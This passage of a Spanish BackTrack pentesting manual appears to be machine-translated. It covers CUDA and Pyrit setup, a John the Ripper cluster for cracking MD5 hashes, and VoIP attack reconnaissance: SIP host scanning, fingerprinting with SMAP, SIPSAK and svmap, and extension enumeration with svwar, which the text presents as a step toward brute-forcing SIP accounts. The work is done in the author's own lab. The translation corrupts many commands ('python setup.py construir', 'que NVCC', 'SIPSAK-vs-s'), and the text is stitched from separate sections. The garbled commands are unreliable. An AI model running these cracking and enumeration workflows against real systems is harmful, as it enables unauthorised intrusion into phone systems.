0x09 - Referencias y enlaces Para leer más acerca de este tema, por favor vea lo siguiente:

• http://www.cs.virginia.edu/ ~ kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf • http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html • http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf • http://www.nethemba.com/mifare-classic-slides.pdf • http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - Acerca de MI1 es un "entusiasta plena seguridad tiempo" con título universitario en el campo de la informática. Recientemente centrando su pasión por cosas USRP y RFID.

Privilege Escalation

CUDA en BackTrack 5

CUDA en BackTrack 5

Esta guía es un trabajo en progreso, y está diseñada para ayudar a aquellos que necesitan obtener CUDA trabajando en sus máquinas inversas.

Comience por la preparación de sus fuentes del núcleo para la instalación del controlador Nvidia:

root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

Descargar drivers de Nvidia de acuerdo con la arquitectura de CPU:

• 32 • 64

Asegúrese de que no está en una sesión X (cerrar la sesión a la consola), y ejecutar el instalador del

Page 49: Manual Backtrack

controlador Nvidia.

A continuación, descargue el kit de herramientas CUDA, de acuerdo con la arquitectura de CPU:

• 32 • 64

Lo ideal es instalar el kit de herramientas CUDA en / opt. esta guía se presupone esta ruta de instalación. Configurar las variables de entorno para que el comando NVCC funciona. Usted puede hacer esto añadiendo las siguientes líneas en el archivo / root / .bashrc archivo:

PATH = $ PATH :/ opt / cuda / bin LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib export PATH export LD_LIBRARY_PATH

A continuación, ejecute:

root @ bt: ~ # source / root / .bashrc root @ bt: ~ # ldconfig

El propósito de esto era conseguir compilador NVCC instalado. Usted puede comprobar que todo está configurado correctamente:

root @ bt: ~ # que NVCC / Opt / cuda / bin / NVCC root @ bt: ~ # NVCC-V NVCC: NVIDIA (R) Cuda conductor compilador Copyright (c) 2005-2011 NVIDIA Corporation Construido sobre Sun_Mar_20_16: 45:27 _PDT_2011 Cuda herramientas de compilación, versión 4.0, V0.2.1221 root @ bt: ~ #

Ahora que el controlador de Nvidia CUDA y kit de herramientas se instalan, podemos probar su funcionalidad con una herramienta GPU potencia, como Pyrit.

root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ Pyrit root @ bt: ~ # cd Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd .. / .. / root @ bt: ~ # cd Pyrit / cpyrit_cuda && python setup.py construir && python setup.py install

Ejecutar un punto de referencia para ver que todo funciona como se espera:

root @ bt: ~ # Pyrit punto de referencia Pyrit 0.4.1-dev (svn R308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com Este código se distribuye bajo la v3 Licencia Pública General GNU +

Punto de referencia en funcionamiento (63.787,8 PMKs / s) ... \

Computarizada 63.787,82 PMKs / s total. # 1: 'CUDA-Device # 1' GeForce GTX 295: 11558.7 PMKs / s (RTT 3,0) # 2: "CUDA-Device # 2 'GeForce GTX 295: 10912.5 PMKs / s (RTT 2.9) # 3: "CUDA-Device # 3 'GeForce GTX 295: 10632.1 PMKs / s (RTT 3,0) # 4: "CUDA-Device # 4 'GeForce GTX 295: 11654.7 PMKs / s (RTT 2.9) # 5: "CUDA-Device # 5" GeForce GTX 295: 10868.9 PMKs / s (RTT 2.9) # 6: "CUDA-Device # 6 'GeForce GTX 295: 10322.8 PMKs / s (RTT 3,0)

Page 50: Manual Backtrack

# 7: 'CPU Core (SSE2)': 500,7 PMKs / s (RTT 2.7) # 8: "CPU Core (SSE2) ': 508,9 PMKs / s (RTT 2.8)

Éxito! Ahora podemos utilizar las herramientas CUDA BackTrack impulsados desde dentro.

JTR grupo

La construcción de un Juan el destripador Cluster en Backtrack5 R2 y R3

• En este tutorial vamos a crear un grupo que nos va a ayudar en la formación de grietas hashes con John the Ripper.

• Lo primero que quiero hacer es instalar libssl-dev y MPICH2 después de que lo configura. (Nota: secretword debe ser el mismo en cada máquina.)

root @ bt: ~ # apt-get install MPICH2 libssl-dev root @ bt: ~ # touch / etc / mpd.conf root @ bt: ~ # chmod 600 / etc / mpd.conf root @ bt: ~ # echo "secretword = bt" >> / etc / mpd.conf root @ bt: ~ # touch mpd.hosts root @ bt: ~ # echo "192.168.1.69:1" mpd.hosts >> root @ bt: ~ # chmod 600 mpd.hosts root @ bt: ~ # mpdboot root @ bt: ~ # mpdtrace bt root @ bt: ~ # mpdallexit

• Ahora instale la versión de la MPI de John the Ripper.

root @ bt: ~ / Desktop # wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2-mpi8.tar.gz root @ bt: ~ / Desktop # tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz root @ bt: ~ / Desktop/john-1.7.3.1-all-2-mpi8/src # make clean linux-x86-sse2 root @ bt: ~ # mv-f john-1.7.3.1-all-2-mpi8 pentest / / contraseñas / john-mpi

• Después de instalar la versión MPI de John the Ripper configuramos nuestro archivo / etc / hosts.

root @ bt: ~ # nano / etc / hosts 127.0.0.1 localhost 192.168.1.69 servidor 192.168.1.70 nodo1

# Las siguientes líneas son recomendables en equipos que pueden IPv6 :: 1 localhost ip6-localhost loopback ip6- fe00 :: 0 ip6-localnet ff00 :: 0 ip6-mcastprefix ff02 :: 1 ip6-allnodes

Page 51: Manual Backtrack

ff02 :: 2 ip6-allrouters ff02 :: 3 ip6-allhosts

NOTA: Haga exactamente lo mismo en el cliente.

• Una vez que tenemos el servidor y la configuración del cliente es el momento para que nuestro servidor SSH y transferir los archivos de configuración desde el servidor al cliente.

root @ bt: ~ # ssh [email protected] mkdir-p / root / .ssh root @ bt: ~ # cat / root / .ssh / id_rsa.pub | ssh [email protected] 'cat >> .ssh / authorized_keys' root @ bt: ~ # scp / root / mpd.hosts [email protected] :/ root / root @ bt: ~ # scp / etc / mpd.conf [email protected] :/ etc / root @ bt: ~ # scp / etc / hosts [email protected] :/ etc /

• Si partimos del cluster deberíamos ver nuestro servidor y el cliente.

root @ bt: ~ # mpdboot-v - file = / root / mpd.hosts-n 2 mpdallexit en marcha bt LANZAMIENTO mpd en bt vía DURACIÓN mpd en bt LANZAMIENTO mpd en 192.168.1.70 a través bt2 DURACIÓN mpd en 192.168.1.70

root @ bt: ~ # mpdtrace bt bt2

• Ahora vamos a probar nuestra agrupación.

root @ bt: ~ # echo "admin: 21232f297a57a5a743894a0e4a801fc3"> / root / prueba root @ bt: ~ # scp / root / prueba [email protected] root :/ / root @ bt: ~ # mpiexec-host 192.168.1.69-np 2 / pentest / passwords / john-mpi / run / john - Formato: raw-MD5 / root / prueba Cargado un hash de la contraseña (Raw MD5 [prima-md5]) admin (admin) admin (admin) Tema: 1 suposiciones: 1 hora: 0:00:00:00 100% (1) c / s: 160 intentar: admin - Adminis Tema: adivina 0: 1 hora: 0:00:00:00 100% (1) c / s: 133 intentando: admin - admins

Pyrit grupo

La construcción de un Cluster Pyrit Backtrack5 R2 y R3 • En este tutorial vamos a crear un clúster en Backtrack5 R2 mediante Pyrit. • Pyrit viene instalado por defecto en Backtrack5 R2. Si lo ha eliminado, sólo tiene que utilizar apt-

get install para instalarlo. • El primer paso para crear un grupo Pyrit es crear un archivo de configuración.

root @ bt:. ~ # mkdir ~ / Pyrit

Page 52: Manual Backtrack

root @ bt: ~ # nano ~ / .pyrit / config root @ bt: ~ # cat ~ / .pyrit / config

default_storage = file :/ / limit_ncpus = 0 rpc_announce = true rpc_announce_broadcast = false rpc_knownclients = 192.168.1.69 (Esta es la IP de los servidores) rpc_server = true workunit_size = 75000

• Después de tener el archivo de configuración anterior en todas nuestras máquinas, se inicia el servidor.

root @ bt: ~ # Pyrit servir

• Ahora, desde que el cliente debe ser capaz de ver ambos núcleos.

NOTA: El comando Pyrit list_cores tiene un error que cuando se utiliza el servidor se bloquee.

• Podemos probar nuestro cúmulo de nueva construcción con opción de punto de referencia Pyrit.

root @ bt: ~ # Pyrit punto de referencia

• Si cambiar al servidor mientras se ejecuta el punto de referencia, se puede ver que en la actualidad uno cliente está conectado.

Voz sobre IP

Pentesting VoIP con BackTrack

Page 54: Manual Backtrack

Contenido [hide]

• 1 Pruebas de Penetración con BackTrack VOIP

• 2 Típico VoIP Topologías

• 2,1 Self Hosted

• 2,2 Hosted Services

• 2.3 Servicio Online SIP

• 3 Fundamentos SIP

• 3.1 Las solicitudes SIP / Métodos

•3

• 3.2 Las res

Page 55: Manual Backtrack

Pruebas de Penetración con BackTrack VOIP VoIP es una tecnología fascinante que ofrece muchos beneficios y soluciones rentables para la comunicación. Cada vez más las pequeñas empresas y las empresas están reemplazando sus viejos sistemas de telefonía tradicionales con un sin basados en IP. Una PBX VoIP basado puede proporcionar muchas características, tales como: varias extensiones, identificador de llamadas, correo de voz, IVR, capacidades de grabación de conversaciones, registro, uso con teléfonos basados en hardware o software de base (también conocidos como teléfonos de software). Hoy en día hay muchos proveedores de PBX, teléfonos IP, servicios de VoIP y equipos tales como: Cisco, Avaya y Asterisk, SNOM, THOMSON ... Con la nueva tecnología viene un nuevo reto, tanto para la parte defensiva y ofensiva de la seguridad, uno de los " grandes "peligros de las líneas telefónicas tradicionales es que es susceptible a intrusos. La "escuela vieja" manera de interceptar la línea telefónica de alguien era conectar físicamente un pequeño transmisor que se conecta dentro o fuera de sus instalaciones en alguna parte a lo largo del cable de teléfono.

Sistemas de telefonía IP también son susceptibles a la escucha, hacerlo en un entorno IP es un poco más difícil de ejecutar, detectar y requieren más los conocimientos y el conjunto adecuado de herramientas. En este artículo no vamos a hablar de un proveedor en particular o de la técnica, pero vamos a echar un vistazo a los conceptos y las herramientas disponibles para atacar a nuestra disposición VoIP en Backtrack Linux. El objetivo principal de este artículo es presentar las herramientas y su uso con el fin de ayudarle a elegir la herramienta adecuada para la situación correcta. Vamos a examinar algunos vectores de ataque del mundo real y descubrir cómo BackTrack puede ayudarnos pentesting VoIP, también vamos a examinar algunas de las herramientas que se presentan en BackTrack y su uso.

Típico VoIP Topologías Hay varias maneras se puede telefonía basada en IP implementadas, estas son algunas topologías comunes y su uso:

Auto Hosted

Una PBX (ie Asterisk) está instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios de telefonía PSTN a través de una troncal SIP / PRI, el tráfico de VoIP fluye a través de una VLAN dedicada.

Visio diagrama de Amir Avraham

Servicios de Alojamiento

No hay necesidad de un PBX en el sitio. Sólo un switch, un router, teléfonos IP y una conexión a la central a través de proveedor de servicios de Internet o IP / VPN conexión, cada teléfono se configura con información de la cuenta SIP.

Page 56: Manual Backtrack

Servicio en línea SIP

Servicios como sipme.me proporciona una aplicación para PC o los teléfonos inteligentes y una cuenta gratuita sorbo, que ofrece precios más bajos para las llamadas internacionales y las llamadas gratuitas entre los usuarios de los servicios mediante la asignación de un número de teléfono móvil a cada suscriptor.

SIP Basics El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada concentrándose la voz y / o el tráfico de video soportado por un protocolo como RTP (Protocolo de transporte en tiempo real). SIP es un protocolo de capa de aplicación que utiliza UDP para el transporte (TCP y SCTP se puede utilizar también).

• SIP normalmente utiliza los puertos 5060 TCP o UDP para señalización cifrada o 5061 para el transporte cifrado mediante TLS.

SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP utilizando una petición / respuesta modelo. Al igual que una petición HTTP de un navegador de una solicitud de cliente SIP se realiza mediante un URI SIP un agente de usuario y un método / solicitud. SIP utiliza el correo electrónico como formato de direcciones: user / teléfono @ dominio / IP es un típico URI SIP se ve así:

sip: [email protected], sip: [email protected], sip: [email protected]: 5060

De acuerdo con la solicitud presentada por el cliente será recibido una respuesta con un código de estado o de error, las tablas siguientes se describen las peticiones y las respuestas disponibles en el protocolo SIP.

Pide SIP / Métodos

Solicitar Descripción

INVITAN Se utiliza para invitar y dar cuenta de participar en una sesión de llamada.

ACK Acusar recibo de una petición INVITE.

CANCELAR Cancelar una solicitud pendiente.

REGISTRO Registrar el usuario con un servidor SIP.

OPCIONES Muestra información acerca de las capacidades de una persona que llama.

BYE Termina una sesión entre dos usuarios en una llamada.

CONSULTE

Indica que el destinatario (identificado por la URI de la solicitud)

debe contactar a un tercero que utilice la información de contacto proporcionado en la solicitud.

SUSCRÍBETE El método SUBSCRIBE se utiliza para solicitar el estado actual y

Page 57: Manual Backtrack

actualizaciones de estado de un mando a distancia nodo.

NOTIFICAR

El método NOTIFY se utiliza para notificar a un nodo SIP que un evento

que ha sido solicitada por un método anterior tiene SUBSCRIBE ocurrido.

Un ejemplo SIP "INVITE" Solicitud:

INVITAN SIP: [email protected] SIP/2.0 Via: SIP/2.0/UDP 192.168.1.102; rport; sucursal = z9hG4bKvbxaoqar Max-Delanteros: 70

A: De: "NightRanger" ; Tag = eihgg Call-ID: hfxsabthoymshub @ retroceder CSeq: 649 INVITE Contacto: Content-Type: application / sdp

Allow: INVITE, ACK, BYE, CANCEL, OPTIONS, PRACK, CONSULTE, NOTIFY, SUBSCRIBE, INFO, MESSAGE Soportados: sustituye, norefersub, 100rel User-Agent: Twinkle/1.2

Content-Length: 310

SIP Respuestas

Respuesta Descripción

1xx

Respuestas informativos, solicitud recibida y ser

procesada.

2xx

Respuestas exitosas La acción fue recibida con éxito,

comprendido y aceptado.

3xx Respuestas de redirección

4xx

Solicitar respuestas fracaso de la petición es sintácticamente incorrecta o

no se pueden cumplir en el servidor.

5xx Las respuestas del servidor falla, el servidor incumplido una de las

Page 58: Manual Backtrack

aparentemente solicitud válida.

6xx

Respuestas globales fracaso de la solicitud no puede cumplirse en cualquier

servidor.

Un ejemplo SIP "Trying" Respuesta:

Tratando SIP/2.0 100 Via: SIP/2.0/UDP 192.168.1.102; sucursal = z9hG4bKpmphujka, recibido = 192.168.1.102; rport = 5060 De: "NIghtRanger" ; Tag = eihgg A: Call-ID: hfxsabthoymshub @ retroceder CSeq: 650 INVITE

User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE

Compatible con: sustituye Contacto: Content-Length: 0

SIP llamada entre dos teléfonos Ejemplo

• El teléfono que llama envía una invitación. • El teléfono llamado devuelve una respuesta de 100 (Tratar). • El teléfono llamado entonces comienza a sonar y envía una respuesta de 180 (Ringing). • Cuando la persona toma el teléfono el teléfono llama envía una respuesta de 200 (OK). • El teléfono que llama envía una respuesta ACK. • La conversación se inicia a través de RTP. • Cuando la persona que llama cuelga el teléfono una petición BYE es enviada. • El teléfono que llama responde con 200 (OK).

De ataque Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes VoIP:

• Recopilación de información, Huella y recuento.

Page 59: Manual Backtrack

• Seguimiento de llamadas de tráfico y escuchas telefónicas. • Atacar autenticación. • VLAN salto. • Denegación de servicio / Inundaciones. • Suplantación de identificación de llamadas.

Con el fin de probar las herramientas que ha configurado un sistema de Trixbox PBX y creado 6 extensiones. Me va a utilizar dos teléfonos de software, es un cliente basado en Linux llamado Twinkle y el segundo es un cliente basado en Windows llamado X-Lite. Me va a utilizar la versión última y más grande de Backtrack Linux que es R2. Usted puede encontrar la mayoría de las herramientas de ataque de VoIP en Backtrack bajo el directorio "/ pentest / voip /" directorio:

root @ bt: ~ # cd / pentest / voip / root @ bt :/ pentest / voip #

O simplemente puede navegar a través del menú de KDE para el "Backtrack" → "Voz sobre IP" sub-menús:

Recopilación de información Esta fase es donde nos reunimos información acerca de la topología, servidores y clientes para obtener información tanto como podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la búsqueda de hospederos vivos, el tipo y la versión PBX, servidores VoIP / gateways, clientes (hardware y software) los tipos y versiones, etc ... En vez de enumerar los nombres de usuario "" vamos a enumerar las extensiones SIP. Echemos un vistazo a algunas de las herramientas disponibles en Backtrack que nos ayuden a encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.

SMAP

Backtrack incluye una gran herramienta llamada SMAP, que es un escáner simple para dispositivos con capacidad SIP SMAP envía de varias solicitudes SIP en espera de respuestas de SIP habilitado router DSL, apoderados y agentes de usuario.

Se podría considerar un mash up de NMAP y SIPSAK.

SMAP uso:

root @ bt :/ pentest / VoIP / SMAP #. / SMAP

SMAP 0.6.0 http://www.wormulon.net/

uso: SMAP [Opciones]

-H: esta ayuda -D: aumentar la depuración -O: activar huellas dactilares

Page 60: Manual Backtrack

-O: permitir una mayor toma de huellas dactilares detallado -L: el modo de aprendizaje de huellas dactilares -T: transporte TCP -U: transporte UDP (por defecto -P0: Tratar a todos los hosts en Internet - skip anfitrión descubrimiento -P : Puerto de destino -R : Mensajes al límite de velocidad de segundo -D : Dominio SIP para usar sin provocar sip: -W : Tiempo de espera en milisegundos

Escaneado de un único host:

root @ bt :/ pentest / VoIP / SMAP #. / SMAP 192.168.1.104

SMAP 0.6.0 http://www.wormulon.net/

192.168.1.104: accesible ICMP, SIP habilitado

1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Escaneado de un rango de direcciones IP:

root @ bt :/ pentest / VoIP / SMAP #. / 192.168.1.130/24 SMAP

SMAP 0.6.0 http://www.wormulon.net/

192.168.1.20: accesible ICMP, SIP habilitado 192.168.1.22: accesible ICMP, SIP habilitado 192.168.1.0: ICMP inalcanzable, SIP desactivado 192.168.1.1: ICMP inalcanzable, SIP desactivado 192.168.1.2: ICMP inalcanzable, SIP desactivado 192.168.1.3: ICMP inalcanzable, SIP desactivado ---- EDIT --- 192.168.1.250: ICMP inalcanzable, SIP desactivado 192.168.1.251: ICMP inalcanzable, SIP desactivado 192.168.1.252: ICMP inalcanzable, SIP desactivado 192.168.1.253: ICMP inalcanzable, SIP desactivado 192.168.1.254: ICMP inalcanzable, SIP desactivado 192.168.1.255: ICMP inalcanzable, SIP desactivado

256 hosts escaneados, 7 alcanzables ICMP, 2 con capacidad SIP (0,8%)

Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella digital del tipo cliente / servidor y versión:

root @ bt :/ pentest / VoIP / SMAP #. / SMAP-O 192.168.1.104

SMAP 0.6.0 http://www.wormulon.net/

Page 61: Manual Backtrack

192.168.1.104: accesible ICMP, SIP habilitado mejor estimación (70% seguro) huella digital: Asterisk PBX SVN-r56579 tronco- User-Agent: Asterisk PBX

1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

En el caso de SMAP no podía nuestra huella anfitrión se utiliza el argumento-l para ponerlo en modo de aprendizaje para proporcionar alguna información útil:

root @ bt :/ pentest / VoIP / SMAP #. / SMAP-l 192.168.1.104

SMAP 0.6.0 http://www.wormulon.net/

AVISO: test_accept: "Accept: application / sdp" AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY" AVISO: test_supported: "Con el apoyo: sustituye" AVISO: test_via: capitalización de transporte: 2 AVISO: test_via: "sucursal; alias; recibido; rport" AVISO: test_via: Por favor, añadir cmpstr nuevo AVISO: test_via: capitalización de transporte: 2 192.168.1.104: accesible ICMP, SIP habilitado mejor estimación (70% seguro) huella digital: Asterisk PBX SVN-r56579 tronco-

HUELLA información: newmethod = 501 accept_class = 2 allow_class = 201 supported_class = 8 via_class = 2 hoe_class = ignorar options = 200 brokenfromto = 404 PRACK = 481 mesa de ping = 501 invitar = 200 User-Agent: Asterisk PBX

1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Otra característica útil de SMAP es el argumento-d, que permite la salida de depuración para verbosidad intenta utilizar el o-junto con él a ver el proceso de toma de huellas dactilares en los detalles.

root @ bt :/ pentest / VoIP / SMAP #. / SMAP-d 192.168.1.104

SMAP 0.6.0 http://www.wormulon.net/

DEBUG: IP local: 212.235.66.182 DEBUG: IP local: 212.235.66.182 DEBUG: bind () con éxito DEBUG: RAW socket abierto DEBUG: pasar de 1 a S_START S_PING

Page 62: Manual Backtrack

DEBUG: Responder ICMP Echo error DEBUG: 192.168.1.104 / 1 petición: solicitud SIP OPTIONS (válido)

DEBUG: respuesta pertenece a la tarea 1 (192.168.1.104)

DEBUG: ACK: ACK sip: localhost SIP/2.0 Via: SIP/2.0/UDP 212.235.66.182:12345; sucursal = z9hG4bK.56689, alias, recibido = 192.168.1.105; rport = 5060 De: ; Tag = 6b9ae50e67345d3b A: ; Tag = as14262fec Call-ID: [email protected] CSeq: ACK 23915 Content-Length: 0 User-Agent: SMAP 0.6.0

--- Fin del ACK - 192.168.1.104: accesible ICMP, SIP habilitado DEBUG: destruir la tarea 1

1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

SIPSAK

SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el método de solicitud única opción. Podemos usarlo para huellas digitales y enumeración. Usted no encontrará SIPSAK en el directorio "/ pentest / voip /" directorio, se puede ejecutar desde cualquier lugar simplemente escribiendo SIPSAK.

root @ bt: ~ # SIPSAK SIPSAK 0.9.6 por Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils, informe de errores a Ohlmeier [email protected] rodaje: SIPSAK [-f archivo] [- L]-s SIPURI rastro: SIPSAK-T-s SIPURI usrloc: SIPSAK-U [-I | M] [-b NÚMERO] [-e NÚMERO] [-x NÚMERO] [-z NÚMERO]-s SIPURI usrloc: SIPSAK -I | M [-b NÚMERO] [-e NÚMERO]-s SIPURI usrloc: SIPSAK-U [-C SIPURI] [-x NÚMERO]-s SIPURI mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI inundación: SIPSAK-F [-e NÚMERO]-s SIPURI azar: SIPSAK-R [-t NÚMERO]-s parámetro SIPURI adicional en todos los modos: [-a CONTRASEÑA] [-d] [ -i] [-H HOSTNAME] [-l PUERTO] [-m número] [-n] [-N] [-r puerto] [-v] [-V] [-w]-h muestra este mensaje de ayuda - V imprime cadena de versión sólo-f file El archivo que contiene el mensaje de SIP para enviar uso - por nivel de entrada-L desactivar CR (\ r) inserción en los archivos-s SIPURI la URI del servidor de destino en forma sip: [usuario @] nombre_servidor [: puerto]-T activa el modo de traceroute-U se activa el modo usrloc-I simula algunas llamadas exitosas con sí mismo-M envía mensajes a sí mismo-C SIPURI utilizar el URI como contacto en REGISTER-b Número del apéndice número inicial de el nombre de usuario (por defecto: 0)-E Número de la numer de finalización del apéndice del nombre de usuario-o número de número de dormir ms antes de enviar el siguiente petición-x NÚMERO expira el campo de encabezado valor (por defecto: 15)-z NÚMERO activa el azar eliminación de usuario encuadernaciones-F se activa el modo de inundación-R activa los modues aleatorios (peligroso)-t Número El número máximo de caracteres destrozado en modo aleatorio (por defecto: duración petición)-l PORT del puerto local para usar (por defecto: ninguno) - r El puerto remoto (por defecto: 5060)-p objetivo petición HOSTNAME (proxy saliente)-H HOSTNAME sobrescribe el nombre de host local en todo NÚMERO headers-m el valor de la cabecera max-forwards campo-n usar FQDN en lugar de direcciones IP en la Via-Line-i desactivar la inserción de un Via-Line-una contraseña para la autenticación de contraseña (si la contraseña se omite = "")-u nombre de usuario de autenticación STRING-d-v ignorar redireccionamientos cada v produce más verbosidad (máx. 3) -w IP extracto de la advertencia en respuesta-g cadena de reemplazo para una marca especial en la sustitución mensaje-G activa de las variables-N devuelve códigos de salida compatible con Nagios-q Cadena de búsqueda de una

Page 63: Manual Backtrack

expresión regular en las respuestas y en caso de fallo de error de retorno-W NÚMERO volver advertencia Nagios si retransmisión> número B-STRING enviar un mensaje con la cadena como cuerpo-O CADENA Content-Disposition Número NÚMERO valor-P de los procesos de start-A Número Número de ejecuciones de pruebas e imprimir sólo tiempos-S utilizan un mismo puerto para la recepción de y el envío-c SIPURI utilizar el URI como en De MENSAJE-D multiplicador de tiempo de espera para INVITAR NÚMERO transacciones y medios de transporte confiables (por defecto: 64)-E STRING especificar de transporte a utilizar-j STRING agrega cabeceras adicionales a la solicitud

He aquí un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver en el resultado de que el dispositivo que consulta es un Audiocodes MP-114 gateway FXS.

root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221

mensaje recibido: SIP/2.0 200 OK Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias De: sip: [email protected]: 51601; tag = 97ac9e5 A: sip: 192.168.1.221; tag = 1c1785761661 Call-ID: [email protected] CSeq: 1 OPCIONES Contacto: Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad Permitir: REGISTRO, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE, UPDATE servidor:-Audiocodes-SIP-Gateway-MP 114 FXS/v.5.40A.040.005 X-Recursos: telchs = 4/0; mediachs = 0/0 Accept: application / sdp, application / simple-mensaje-resumen, el mensaje / sipfrag Content-Type: application / sdp Content- Longitud: 343 v = 0 o = 1785763980 1785763858 AudiocodesGW EN IP4 192.168.1.221 s = Teléfono-Call C = EN IP4 192.168.1.221 t = 0 0 = 6000 m audio RTP / AVP 18 8 0 127 a = rtpmap: 18 G729 / a = 8000 fmtp: 18 annexb = no a = rtpmap: 8 PCMA/8000 a = rtpmap: 0 PCMU/8000 a = rtpmap: 127 telephone-event/8000 a = fmtp: 127 = 0-15 un ptime: 20 a = sendrecv a = RTCP: 6001 EN IP4 192.168.1.221 ** respuesta recibida después de 67,923 ms ** SIP/2.0 200 OK final recibida

SIPScan

Sip-Scan es un escáner simple para saborear hosts habilitados para que pueda escanear un solo host o una subred completa.

Sip-scan uso:

root @ bt :/ pentest / voip / sipscan # / sip exploración--. ayudar . / Sip-scan versión [unknown] llamado Getopt :: std :: getopts (versión 1,05), funcionando bajo la versión Perl 5.10.0. Uso: sip-scan [opciones]

-V Ser detallado. -I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0) -P puerto puerto remoto para escanear. (Por defecto: 5060) -L puerto local origen de los paquetes. (Por defecto: 5060) -Dn [p] Espere n ms después de cada paquete enviado (por defecto: 50ms) o si 'p' es dado, envíe n paquetes por segundo (por defecto: 20) -Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)

Page 64: Manual Backtrack

Red de especificaciones contiene el comodín * nm o rangos.

Escaneo de una subred:

root @ bt :/ pentest / voip / sipscan #. / sip-scan-i eth0 192.168.1.1-254 192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.22: Asterisk PBX 192.168.1.104: Asterisk PBX 192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055 192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27 192.168.1.219: "Exelmind de control de llamada Switch (CCS)" 192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP

SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escáner de elección Puede ser utilizado para escanear identificar y huella digital de una sola dirección IP o un rango de direcciones IP. Svmap permite especificar el método de la petición que está siendo usado para la digitalización, el método predeterminado es OPCIONES, ofrece depuración y opciones de verbosidad e incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el modificador /. Svmap h-para ver todos los argumentos disponibles

. root @ bt :/ pentest / voip / sipvicious # / svmap.py uso: svmap.py [opciones] host1 host2 hostrange ejemplos: svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10,0 ... .1.1/24 \> 1.1.1.1-20 1.1.2-20 * 4.1 * * svmap.py-s session1 - aleatorizar 10.0.0.1 / 8 svmap.py - resume session1-v svmap.py - p5060-5062-m 10.0.0.3-20 INVITAR

Escaneo de un rango de direcciones IP:

root @ bt :/ pentest / voip / sipvicious #. / svmap.py 192.168.1.1-254 | SIP Device | Agente de usuario | Huella | -------------------------------------------------- - | 192.168.1.104:5060 | Asterisk PBX | disabled | | 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |

Habilitar exploración huellas digitales

. root @ bt :/ pentest / voip / sipvicious # / svmap.py 192.168.1.1-254 - fp

Page 65: Manual Backtrack

Extensiones Enumeración

Enumeración de extensión puede ayudar a un atacante mediante la búsqueda de extensiones válidas en un sistema de VoIP que luego puede conducir a un ataque de fuerza bruta sobre las cuentas SIP. Enumeración obras de ampliación por los errores que examinan devueltos por los métodos solicitudes SIP REGISTER como, opciones y INVITAR

Svwar

Svwar es también una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una gama de extensiones o utilizar un archivo de diccionario svwar apoya todos los de los tres métodos de enumeración de extensión como se ha mencionado anteriormente, el método por defecto para la enumeración es registrarse.

Uso:

root @ bt :/ pentest / voip / sipvicious #. / svwar.py Uso: svwar.py [opciones] destino ejemplos: svwar.py-e100-999 10.0.0.1 svwar.py-d dictionary.txt 10.0.0.2

Ejemplo:

root @ bt :/ pentest / voip / sipvicious #. / 192.168.1.104 svwar.py-e100-400 | Extensión | Autenticación | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth |

Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro método sorbo utilizando el m-argumento, también se puede añadir-v o t-vv para mostrar más información.

